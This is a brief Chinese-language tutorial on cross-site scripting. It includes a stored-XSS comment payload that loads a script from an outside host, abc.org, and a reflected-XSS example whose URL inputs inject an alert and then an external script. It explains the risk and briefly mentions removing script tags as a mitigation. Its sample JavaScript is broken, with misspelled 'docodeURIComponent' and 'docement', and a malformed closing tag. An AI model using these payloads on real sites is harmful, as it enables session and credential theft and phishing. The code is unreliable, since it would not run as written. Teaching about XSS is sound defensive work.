跨站腳本可以稱為XSS,是攻擊者向目標Web站點注入HTML標簽或者腳本。所以在開發過程中javaScript程序員必須意識到這點。
跨站腳本攻擊(Cross-Site Scrpting)簡稱為XSS,指的是向其他域中的頁面的DOM注入一段腳本,該域對其他用戶可見。惡意用戶可能會試圖利用這一弱點記錄用戶的擊鍵或操作行為,以竊取用戶的某些信息。在過去,包含用戶提交內容的站點特別容易成為這一漏洞的目標。例如:用戶在博客中提交評論,並且在其中包含類似於如下代碼的腳本塊:
Nice Bolg!Thanks for post that ...<script type="text/javascript" src="http://abc.org/aa.js"></script>
當瀏覽該頁面時,僅有評論是可見的,但對於每一個訪問該頁面的用戶,瀏覽器都將為該用戶下載一份外部腳本。在該外部腳本中可以窺探用戶的登錄信息或者其他屏幕內容,甚至重寫DOM以實現網絡釣魚的企圖。
例如:
<script>
var name=docodeURIComponent(window.location.search.substring(1))||"";
docement.write("hello"+name);
<script>
上面腳本是獲得url后面以?開頭的的后面部分
**如果輸入 URL+world;那么輸出的是helloworld
**那如果輸入 URL+%3Cscript%3Ealert('world')%3C/script%3E 那么注入的腳本只顯示一個彈窗(%3C和%3E是尖括號編碼)
**接下來如果輸入 URL+%3Cscript src=js地址%3E%3C/script%3E 那么注入的就是一個js,那么可能就會出現攻擊
***當然在javascript中我們可以通過腳本將<script>兩邊的標簽移除,或替換